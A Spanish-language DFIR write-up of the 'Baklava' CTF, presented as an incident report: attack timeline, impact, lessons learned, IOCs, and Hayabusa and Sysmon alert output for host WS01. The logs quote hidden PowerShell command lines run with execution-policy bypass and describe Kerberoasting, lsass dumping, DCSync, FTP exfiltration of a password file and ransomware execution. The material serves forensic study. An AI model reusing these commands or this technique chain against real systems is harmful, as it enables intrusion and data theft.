Línea temporal del ataque

Hora (UTC)EquipoFuenteUsuarioEvento
0:03:25WS01MFTN/ACreación del fichero C:\Schtask\check-updates.ps1
9:29:00WS01RAMmshutterCorreo malicioso desde contabilidadm3gac0rp@gmail.com
11:23:11WS01EventLog SysmonmshutterDescarga desde https://file.io/2UvVGDED0zrF
11:25:08WS01EventLog SysmonmshutterDescarga desde https://file.io/ufFVdF8eLeK8
11:26:00WS01EventLog SysmonmshutterDescarga de factura.iso desde https://file.io/zgsJx9hcnscg
11:26:17WS01EventLog SysmonmshutterMontaje de la ISO C:\Users\mshutter\Downloads\factura.iso
11:26:31WS01EventLog VHDMPmshutterMontaje de ISO – E:\factura\Factura.lnk
11:26:39WS01EventLog SysmonmshutterEjecución del powershell : E:\factura\f\p.ps1
11:26:44WS01EventLog SysmonmshutterMontaje de ISO – E:\Factura\f\enc.dat
11:30:22WS01MFTmshutterCreación del fichero C:\Users\mshutter\AppData\Local\Microsoft\OneDrive\Update\OneDriveUpdater.ps1
11:32:12WS01MFTN/ACreación del fichero C:\Schtask\update.dat
11:33:37WS01EventLog SysmonmshutterModificación del fichero C:\Schtask\check-updates.ps1
11:33:38WS01EventLog SysmonlocaladminEjecución de la tarea programada C:\Schtask\check-updates.ps1 (ahora maliciosa)
11:33:59WS01EventLog SysmonlocaladminEjecución del powershell C:\Schtask\check-updates.ps1
11:39:25WS01EventLog SysmonlocaladminCreacíón del fichero C:\Users\Public\update.ps1
11:39:47WS01EventLog SysmonlocaladminCreación del fichero C:\Users\Public\psexec.exe
11:40:09WS02MFTN/ACreación del fichero C:\update.ps1
11:41:06WS01EventLog SysmonlocaladminEjecución de PsExec contra WS02 ejecutando c:\update.ps1
11:41:07WS02MFTN/ACreación del fichero PSEXESVC.exe
11:42:49WS02MFTlocaladminCreación del fichero C:\Users\localadmin\AppData\Local\Microsoft\OneDrive\Update\OneDriveUpdater.ps1
11:43:07WS02MFTN/ACreación de la tarea programada OneDriveUpdateTask
11:47:59WS02PrefetchlocaladminEjecución de Rubeus35
11:51:27WS02PrefetchlocaladminEjecución de Rubeus contra la cuenta de sqladmin
11:51:27DC02EventLog SecuritylocaladminKerberoasting contra sqladmin desde la IP 192.168.20.42 (WS02)
11:54:39WS02PrefetchN/AEjecución de whoami.exe
12:05:57SRV01EventLog Terminal ServicessqladminInicio de sesión por Escritorio Remoto con sqladmin desde 192.168.20.42
12:06:46SRV01EventLog SysmonSYSTEMSe deshabilita Windows Defender
12:07:20SRV01EventLog SysmonSYSTEMVolcado de memoria del lsass.exe con Mimikatz (PowerSploit)
12:08:19DC02EventLog SecurityhelpdeskPosible DC Sync con Mimikatz
12:08:44DC02EventLog SysmonAdministradorCreación de la cuenta administrad0r
12:09:31DC02EventLog SysmonAdministradorSe añade el usuario administrad0r al grupo Admin de dominio
12:12:08DC02EventLog Terminal Servicesadministrad0rInicio de sesión por Escritorio Remoto de administrad0r
12:25:37DC02EventLog Sysmonadministrad0rDescarga de FileZilla portable
12:31:33DC02EventLog Sysmonadministrad0rConexión FTP contra 200.234.235.200
12:32:00DC02EventLog Sysmonftp1Exfiltración del fichero STOR management-passwords-1.kdbx
12:32:26DC02EventLog Sysmonftp1Descarga del FTP del fichero baklavasom.ps1
12:33:29DC02EventLog Sysmonadministrad0rEjecución del ransomware PsRansom C:\Users\administrat0r.MEGACORP\Desktop\baklavasom.ps1
12:34:36SRV01EventLog SysmonN/AAparecen los primeros ficheros cifrados en SRV01
12:34:43SRV01MFTN/AAparece la primera nota de ransom  C:\files\readme.txt
14:30:00N/AOrganizaciónN/APrimer contacto de la Organización con nosotros

Impacto

El impacto del incidente se considera como MEDIO para la Organización, ya que se han cifrado únicamente los ficheros de un servidor de la misma (del que se disponía de copias de seguridad), y la exfiltración de información se limita a un fichero de contraseñas (que ya han sido cambiadas como parte del proceso de recuperación).

Atribución

El incidente no deja evidencias suficientes como para poder realizar una atribución correcta del mismo, ya que el ransomware es un proyecto de GitHub libremente accesible.

El equipo de ciberinteligencia confirma que ninguno de los IOC o de las TTP observadas a lo largo del incidente permiten asociar el incidente a ninguno de los grupos de ransomware activos en la actualidad.

Lecciones aprendidas

El incidente deja las siguientes lecciones aprendidas:

  • Mejora de las capacidades de detección de correos maliciosos: se recomienda desplegar nuevas capacidades que permiten identificar correos con contenido malicioso (file.io es empleada con frecuencia por los atacantes debido a su carácter efímero, que dificulta el análisis).
  • Concienciación de los usuarios: así mismo, se deberían realizar los esfuerzos necesarios para dotar a los usuarios de la Organización de buenas prácticas de ciberseguridad, especialmente con respecto al uso seguro del correo electrónico.
  • Configuración correcta de permisos de directorios: los atacantes pudieron escalar privilegios al poder modificar una tarea privilegiada que estaba en un directorio no privilegiado. Se recomienda revisar y configurar correctamente estas carpetas.
  • Incremento de la robustez de las contraseñas: el ataque ha podido progresar en gran medida porque las contraseñas de los usuarios privilegiados no eran robustas. Se recomienda establecer de forma general políticas de contraseñas robustas.
  • Despliegue de un EDR: se recomienda el despliegue de una solución EDR (Endpoint Detection & Response), ya que posiblemente habría podido bloquear y alertar de una o varias partes de la cadena del ataque.

Anexo A: IOC

IP

200.234.235[.]200

URL

https://baklava014.duckdns[.]org/

https://file[.]io/zgsJx9hcnscg

https://file[.]io/2UvVGDED0zrF

Puertos no habituales

8800

Usuarios maliciosos

administrat0r

Usuarios afectados por los atacantes

sqladmin

helpdesk

localadmin

Ficheros

OneDriveUpdater.ps1

Update.ps1

Update.dat

Check_updates.ps1

Factura.iso

p.ps1

\baklavasom.ps1

FAQ (del meta, no del incidente)

Antonio, ¿le tienes manía a las imágenes?

No, soy un fan de las imágenes, pero cuando aportan algo. Muchos informes DFIR tienen muchas imágenes… pero para que entren en el Word, se reducen al 25% y no se ve absolutamente nada. Mucho mejor el texto para estos casos.

Además, el texto tiene una ventaja sobre las imágenes: es BUSCABLE. Es decir, dentro de 4 meses tienes otro incidente con este grupo de ransomware, y es tan fácil como abrir de nuevo el documento y darle a buscar (y así no tienes que ir mirando en 94 páginas de informe dónde está el nombre del fichero que te sonaba que había salido en este informe… o en uno de otros 14).

Oye, veo que esto es como una historia ¿No suelen ser los informes de incidentes mucho más parcos en plan “pasó esto aquí, tal día y de esta forma”?

La redacción de informes DFIR tiene dos corrientes filosóficas: el modo bitácora (donde se cuenta como una historia las acciones realizadas) y el modo informe de resultados (donde se cuenta lo que pasó en orden cronológico, aunando todos los trabajos).

Ambos enfoques son correctos: el modo bitácora es muy útil porque permite determinar qué se hizo en cada momento, y porqué se tomaron algunas decisiones en cada momento (por lo que no explica solo el incidente sino también la propia respuesta al mismo).

El modo informe de resultados es muy útil en incidentes muy grandes, en los que un modo bitácora haría prácticamente imposible el seguimiento, y se hace mucho más legible un orden (por ej: equipo a equipo).

Baklava CTF Writeup – Incident Report Style (III)

Contenido

  1. ¡WARNING! ¡LÉEME PRIMERO!
  2. Resumen ejecutivo.
  3. Antecedentes.
  4. Gestión del incidente
    • 4.1. DC02 – 192.168.20.46
    • 4.2. WS02 – 192.168.20.42
    • 4.3. WS01 – 192.168.20.41
    • 4.4. SRV01
  5. Conclusiones finales.
  6. Línea temporal del ataque.
  7. Impacto.
  8. Atribución.
  9. Lecciones aprendidas.
  10. Anexo A: IOC.
  11. FAQ (del meta, no del incidente).

WS01 – 192.168.20.41

Este equipo es el que ha ejecutado la parte cliente de PSEXEC contra WS02, por lo que se sospecha que puede ser el paciente cero del incidente.

Se ejecuta la herramienta Hayabusa con los logs de eventos, obteniendo los siguientes resultados:

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

 │ Top critical alerts:                        Top high alerts:                                                    │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ Antivirus Password Dumper Detection (3)     Suspicious Eventlog Clearing or Configuration Change Activity (295) │

│ Defender Alert (Severe) (3)                 Suspicious PowerShell Parameter Substring (6)                       │ n/a                                         Script Interpreter Execution From Suspicious Folder (4)             │ n/a                                         ETW Trace Evasion Activity (3)                                      │

│ n/a                                         Antivirus Relevant File Paths Alerts (3)                            │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ Top medium alerts:                          Top low alerts:                                                     │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ Reg Key Value Set (Sysmon Alert) (939)      n/a                                                                 │

│ ISO Image Mounted (78)                      n/a                                                                 │

│ Potentially Malicious PwSh (57)             n/a                                                                 │

│ Reg Key Create/Delete (Sysmon Alert) (55)   n/a                                                                 │

│ File Created (Sysmon Alert) (50)            n/a                                                                 │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

Se revisan las alertas, encontrando los siguientes resultados de interés:

  1. Detección de la herramienta Rubeus (Nota: posiblemente sea parte de la organización del CTF, siendo un residuo del mismo)

“2024-03-22 13:47:19.126 +01:00″,”Antivirus Password Dumper Detection”,”crit”,”WS01.megacorp.local”,”Defender”,1116,227,”Threat: VirTool:Win32/Kekeo.A!MTB ¦ Severity: Severe ¦ Type: Tool ¦ User: MEGACORP\mshutter ¦ Path: file:_\\tsclient\_home_ub_Documents_share-vm\Rubeus.exe ¦ Proc: C:\Windows\explorer.exe”,”Action ID: 9 ¦ Action Name: Not Applicable ¦ Additional Actions ID: 0 ¦ Additional Actions String: No additional actions required ¦ Category ID: 34 ¦ Detection ID: {BEDBBF2C-AE5A-45D1-A944-E75B145F29F8} ¦ Detection Time: 2024-03-22T12:46:41.065Z ¦ Engine Version: AM: 1.1.24020.9, NIS: 1.1.24020.9 ¦ Error Code: 0x00000000 ¦ Error Description: The operation completed successfully. ¦ Execution ID: 1 ¦ Execution Name: Suspended ¦ FWLink: https://go.microsoft.com/fwlink/?linkid=37020&name=VirTool:Win32/Kekeo.A!MTB&threatid=2147756241&enterprise=0 ¦ Origin ID: 2 ¦ Origin Name: Network share ¦ Post Clean Status: 0 ¦ Pre Execution Status: 0 ¦ Product Name: Microsoft Defender Antivirus ¦ Product Version: 4.18.24020.7 ¦ Remediation User: ¦ Security intelligence Version: AV: 1.407.622.0, AS: 1.407.622.0, NIS: 1.407.622.0 ¦ Severity ID: 5 ¦ Source ID: 3 ¦ Source Name: Real-Time Protection ¦ State: 1 ¦ Status Code: 1 ¦ Status Description: ¦ Threat ID: 2147756241 ¦ Type ID: 0 ¦ Type Name: Concrete ¦ Unused2: ¦ Unused3: ¦ Unused4: ¦ Unused5: ¦ Unused6: ¦ Unused:”

2) Ejecución de un Powershell posiblemente malicioso (p.ps1) con el usuario mshutter y desde el directorio E:\Factura. El directorio E: no es de sistema, y el nombre de factura evoca a las campañas de .iso maliciosos, que al montarse contenían .lnk u otros contenidos maliciososo:

“2024-03-22 12:26:39.331 +01:00″,”Suspicious PowerShell Parameter Substring”,”high”,”WS01.megacorp.local”,”Sysmon”,1,15784,”Cmdline: “”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”” -ep bypass -nop -w hidden -NoExit .\f\p.ps1 ¦ Proc: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ¦ User: MEGACORP\mshutter ¦ ParentCmdline: C:\Windows\Explorer.EXE ¦ LID: 0x5fa76c ¦ LGUID: 6A095527-648A-65FD-6CA7-5F0000000000 ¦ PID: 6996 ¦ PGUID: 6A095527-6AEF-65FD-B908-000000000900 ¦ ParentPID: 9132 ¦ ParentPGUID: 6A095527-648C-65FD-C901-000000000900 ¦ Description: Windows PowerShell ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271″,”CurrentDirectory: E:\factura\ ¦ FileVersion: 10.0.22621.1635 (WinBuild.160101.0800) ¦ IntegrityLevel: Medium ¦ OriginalFileName: PowerShell.EXE ¦ ParentImage: C:\Windows\explorer.exe ¦ RuleName: – ¦ TerminalSessionId: 3 ¦ UtcTime: 2024-03-22 11:26:39.308″

3) Ejecución del script C:\Schtask\check-updates.ps1 (directorio no habitual)

“2024-03-22 12:33:59.473 +01:00″,”Suspicious PowerShell Parameter Substring”,”high”,”WS01.megacorp.local”,”Sysmon”,1,16141,”Cmdline: “”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE”” -ep bypass -w hidden -NoExit C:\Schtask\check-updates.ps1 ¦ Proc: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ¦ User: MEGACORP\localadmin ¦ ParentCmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule ¦ LID: 0x19cfe1e ¦ LGUID: 6A095527-6CA7-65FD-1EFE-9C0100000000 ¦ PID: 14128 ¦ PGUID: 6A095527-6CA7-65FD-2C09-000000000900 ¦ ParentPID: 2472 ¦ ParentPGUID: 6A095527-632E-65FD-3100-000000000900 ¦ Description: Windows PowerShell ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271″,”CurrentDirectory: C:\Windows\system32\ ¦ FileVersion: 10.0.22621.1635 (WinBuild.160101.0800) ¦ IntegrityLevel: High ¦ OriginalFileName: PowerShell.EXE ¦ ParentImage: C:\Windows\System32\svchost.exe ¦ ParentUser: NT AUTHORITY\SYSTEM ¦ RuleName: – ¦ TerminalSessionId: 0 ¦ UtcTime: 2024-03-22 11:33:59.452″

El fichero está en la MFT, por lo que se solicita a la Organización:

2024-01-21 01:03:25                2024-03-22 19:47:45      2024-03-22 11:31:55       2024-03-22 11:31:55       258         258         ps1         \Schtask\check-updates.ps1   

[Read more…]